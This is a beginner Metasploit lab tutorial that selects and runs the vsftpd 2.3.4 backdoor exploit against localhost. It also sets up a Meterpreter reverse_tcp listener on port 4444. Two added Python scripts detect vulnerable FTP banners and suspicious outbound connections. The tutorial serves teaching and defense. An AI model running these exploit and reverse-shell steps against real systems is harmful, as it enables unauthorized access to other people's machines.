Introduction
In this lab, you will learn the basics of penetration testing using Kali Linux within a controlled environment on the LabEx VM. The focus is on leveraging the powerful Metasploit Framework to identify vulnerabilities, configure payloads, execute exploits, and interact with compromised systems through a Meterpreter session. Designed for beginners, this lab guides you step by step through essential cybersecurity techniques in a safe and structured manner. When you open the terminal, you will be automatically connected to the Kali Linux container's shell, ready to start practicing without needing to manually start or enter the container.
Starting Metasploit Framework
In this first step, you will launch the Metasploit Framework, a key tool for penetration testing in Kali Linux. This step is essential as it sets up the environment for identifying and exploiting vulnerabilities in later steps.
When you open the terminal in the LabEx VM, you will be automatically connected to the Kali Linux container's shell. There is no need to manually start the container or enter the shell; the environment is already configured for you.
Before using Metasploit, you need to ensure it is installed in the Kali Linux container. First, update the package list by typing the following command in the terminal and pressing Enter:
apt update
Next, install the Metasploit Framework. This installation may take a few minutes, so please wait for it to complete.
apt install -y metasploit-framework
Once installed, start the Metasploit console by typing the following command and pressing Enter:
msfconsole
The first time you run this command, it might take a moment to initialize as it sets up the database and loads modules. You will see an ASCII art banner and a prompt similar to this when Metasploit starts:
Metasploit Framework
...
msf6 >
The msf6 > prompt indicates that you are now inside the Metasploit console, ready to interact with the framework. Do not exit the console, as you will use it in the next step to search for and select an exploit.
Searching and Selecting an Exploit
Now that you have started the Metasploit Framework, the next step is to search for and select an exploit. An exploit is a piece of code that takes advantage of a software vulnerability to cause unintended behavior, such as gaining unauthorized access.
Since you are already in the Metasploit console (with the msf6 > prompt), let's search for an exploit related to FTP (File Transfer Protocol), a common service that can have vulnerabilities. Type the following command and press Enter:
search ftp
This command lists exploits and auxiliary modules related to FTP. The output will show a table of matching modules.
Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
   1  auxiliary/scanner/ftp/ftp_version                      normal     No     FTP Version Scanner
   2  auxiliary/scanner/ftp/anonymous                        normal     No     FTP Anonymous Access Scanner
   ...
For this lab, we will use the vsftpd_234_backdoor exploit. To select it, use the use command followed by the exploit's name.
use exploit/unix/ftp/vsftpd_234_backdoor
After selecting the exploit, your prompt will change to include the exploit's name, indicating it is now the active module.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
To view detailed information about the selected exploit, including its options and requirements, type the info command.
info
The output provides details such as the platform, architecture, and available targets.
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
You have now successfully selected an exploit. In the next step, you will configure a payload for this exploit.
Note: Labby cannot read the operation records inside the msf shell, so the following steps will not be verified.
Configuring the Exploit and Payload
With the exploit selected, you now need to configure its options and review payload behavior. A payload is the code that runs on the target system after an exploit succeeds. In current Metasploit builds, this module often runs with its default behavior and may not accept manual payload selection.
Important: Before setting a payload, it's crucial to check which payloads are compatible with your selected exploit. Use the following command to see all compatible payloads:
show payloads
This command shows the payloads compatible with vsftpd_234_backdoor. In some Metasploit versions, cmd/unix/interact appears in the list; in others, it may be missing or treated as invalid. If it is listed, select it with the following command:
set payload cmd/unix/interact
If that command returns an error such as "The value specified is not valid", continue without setting a payload and keep the module default.
Next, you need to configure the exploit options. The RHOST (Remote Host) option specifies the IP address of the target machine. For this simulation, we will set it to 127.0.0.1.
set RHOST 127.0.0.1
Important Note: For this exploit workflow, you do not need to set LHOST or LPORT before running the exploit.
To verify all the settings, use the show options command.
show options
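This displays a table of options for the exploit. Check that the target address is set correctly. The table lists the option as RHOSTS; Metasploit accepts RHOST as an alias for it, which is why the set RHOST command above worked.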
Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)
Your exploit and payload are now configured and ready for execution in the next step.
Executing the Exploit
Having configured the exploit and payload, you are now ready to execute it. The exploit command instructs Metasploit to launch the attack against the specified target (RHOST).
In your Metasploit console, simply type the following command and press Enter:
exploit
Metasploit will attempt to run the exploit. Since there is no actual vulnerable VSFTPD service running on 127.0.0.1 in this lab environment, the exploit will fail. This is expected and demonstrates the process of launching an attack.
The output will show that Metasploit attempted to connect to the target FTP service but failed because the service is not running:
[-] 127.0.0.1:21 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:21).
[*] Exploit completed, but no session was created.
Note: This exploit workflow does not require starting a reverse-shell listener in advance. If the target were vulnerable and reachable, Metasploit would attempt to open an interactive command session.
The message Exploit completed, but no session was created confirms the failure. In a successful scenario with a vulnerable VSFTPD service, this would establish an interactive command shell session, allowing you to execute commands directly on the target system. This step teaches you the fundamental command for launching an exploit, which is a core part of the penetration testing workflow.
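From the defender's side, the question behind this step is whether any FTP server you run advertises the version named in the module title. The following is an added example, not part of the original lab: it parses FTP greetings and flags vsftpd 2.3.4. The function names and the sample greetings are constructed for illustration, and a banner match is a lead to verify, not proof.

```python
import re
import socket

# Version named in this page's module title: "VSFTPD v2.3.4 Backdoor Command Execution".
FLAGGED = ("vsftpd", "2.3.4")
BANNER_RE = re.compile(r"\b(vsftpd|proftpd|pure-ftpd)\b[ /]+v?(\d+(?:\.\d+)+[a-z]?)", re.I)

def read_greeting(host, port=21, timeout=5.0):
    """Read the FTP greeting from a server you administer; no login is attempted."""
    lines = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for line in sock.makefile("r", encoding="latin-1"):
            lines.append(line)
            if re.match(r"\d{3} ", line):  # "NNN " (space) ends a multi-line reply
                break
    return "".join(lines)

def parse_greeting(raw):
    """Return (product, version) advertised in a 220 greeting, or (None, None)."""
    for line in raw.splitlines():
        # Only 220 lines count; "220-" marks a continuation line of the greeting.
        m = re.match(r"220[ -]", line) and BANNER_RE.search(line)
        if m:
            return m.group(1).lower(), m.group(2)
    return None, None

def audit(greetings):
    """Map host -> finding for a dict of host -> raw greeting text."""
    findings = {}
    for host, raw in greetings.items():
        product, version = parse_greeting(raw)
        if (product, version) == FLAGGED:
            findings[host] = "FLAG: advertises vsftpd 2.3.4; verify the build and upgrade"
        elif product is None:
            findings[host] = "UNKNOWN: banner hides the version; check the installed package"
        else:
            findings[host] = f"ok: {product} {version}"
    return findings

SAMPLE = {  # constructed greetings, not captured from real hosts
    "192.0.2.5": "220 (vsFTPd 2.3.4)\r\n",
    "192.0.2.6": "220-Welcome\r\n220 (vsFTPd 3.0.5)\r\n",
    "192.0.2.7": "220 FTP service ready.\r\n",
    "192.0.2.8": "220 ProFTPD 1.3.5e Server (Debian)\r\n",
}

if __name__ == "__main__":
    for host, finding in audit(SAMPLE).items():
        print(host, finding)
```

Because the greeting text is configurable on the server, the UNKNOWN result matters as much as the FLAG: those hosts need a package-level check rather than a banner read.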
Setting Up a Meterpreter Listener
In this final step, you will learn to set up a listener for a Meterpreter payload. Meterpreter is an advanced, feature-rich payload that provides an interactive shell on the target system. Instead of launching an exploit, you will use the exploit/multi/handler module to listen for incoming connections. This is useful when an exploit is delivered through other means (e.g., a malicious file) and you need to catch the reverse connection.
First, switch to the multi/handler module.
use exploit/multi/handler
Your prompt will change to reflect the new module.
msf6 exploit(multi/handler) >
Next, set a Meterpreter payload. We will use one designed for Linux systems. The payload name linux/x86/meterpreter/reverse_tcp follows a logical structure: <platform>/<architecture>/<type>/<protocol>. It specifies a Linux platform, x86 architecture, a Meterpreter payload type, and a reverse TCP connection protocol.
set payload linux/x86/meterpreter/reverse_tcp
Now configure the listener options LHOST and LPORT with the set command, as you did for RHOST. LHOST is the address the handler listens on, and LPORT is the port.
set LHOST 127.0.0.1
Note: You may see a warning message about binding to a loopback address. This is normal when using localhost (127.0.0.1) and can be safely ignored for this lab.
set LPORT 4444
Finally, start the listener using the exploit command.
exploit
Metasploit will start a listener on the specified IP and port, waiting for a Meterpreter session to connect.
[*] Started reverse TCP handler on 127.0.0.1:4444
The console will remain active, waiting for a connection. In a real scenario, if a target machine executed the corresponding Meterpreter payload, a session would be established here. Since no target will connect in this lab, you can stop the listener by pressing Ctrl + C.
To exit the Metasploit console, type exit and press Enter.
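On the machine that runs such a payload, the connection this handler waits for appears as an outbound TCP connection to LHOST:LPORT. The following is an added example, not part of the original lab: it triages `ss -tanp` output for that pattern. The sample output, addresses and process names are constructed, and since LPORT is a configurable option, a port match is a lead to investigate, not proof.

```python
import re

# 4444 is the LPORT set in this lab (and Metasploit's default); extend for your environment.
WATCH_PORTS = {4444}
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')

def split_endpoint(endpoint):
    """Split 'addr:port' (IPv4 or bracketed IPv6) into (addr, port or None for '*')."""
    addr, _, port = endpoint.rpartition(":")
    return addr.strip("[]"), int(port) if port.isdigit() else None

def triage(ss_text, watch_ports=WATCH_PORTS):
    """Return (kind, process, pid, endpoint) findings from `ss -tanp` output."""
    findings = []
    for line in ss_text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] not in ("LISTEN", "ESTAB", "SYN-SENT"):
            continue  # header line or a state this triage ignores
        local_addr, local_port = split_endpoint(cols[3])
        peer_addr, peer_port = split_endpoint(cols[4])
        m = PROC_RE.search(line)
        proc, pid = (m.group(1), int(m.group(2))) if m else ("unknown", None)
        if cols[0] == "LISTEN" and local_port in watch_ports:
            findings.append(("listener", proc, pid, f"{local_addr}:{local_port}"))
        elif cols[0] != "LISTEN" and peer_port in watch_ports:
            # Peer port is the watched one, so this host opened the connection outward.
            findings.append(("outbound", proc, pid, f"{peer_addr}:{peer_port}"))
    return findings

# Constructed `ss -tanp` output for illustration (process names and addresses are made up).
SAMPLE_SS = """\
State    Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN   0      128    127.0.0.1:4444      0.0.0.0:*         users:(("ruby",pid=1500,fd=9))
LISTEN   0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=700,fd=3))
ESTAB    0      0      192.0.2.20:22       192.0.2.3:50222   users:(("sshd",pid=900,fd=4))
ESTAB    0      0      192.0.2.20:51514    192.0.2.99:4444   users:(("update.bin",pid=2291,fd=3))
SYN-SENT 0      1      192.0.2.21:40022    192.0.2.99:4444
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_SS):
        print(finding)
```

The SYN-SENT row has no process column, which is what `ss` shows when it is run without the privileges needed to see another user's sockets; the finding is still reported with the process marked unknown.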
Summary
In this lab, you have learned the fundamental steps of penetration testing using Kali Linux and the Metasploit Framework. You started by launching Metasploit, searched for and selected an exploit, reviewed payload compatibility, configured exploit options, and executed the attack in a simulated environment. You also learned how to set up a standalone listener for an advanced Meterpreter payload. These steps provide a practical introduction to the core workflow of identifying vulnerabilities, preparing payloads, and understanding the exploitation process. By following this structured approach, you have gained hands-on experience with essential cybersecurity tools and techniques.


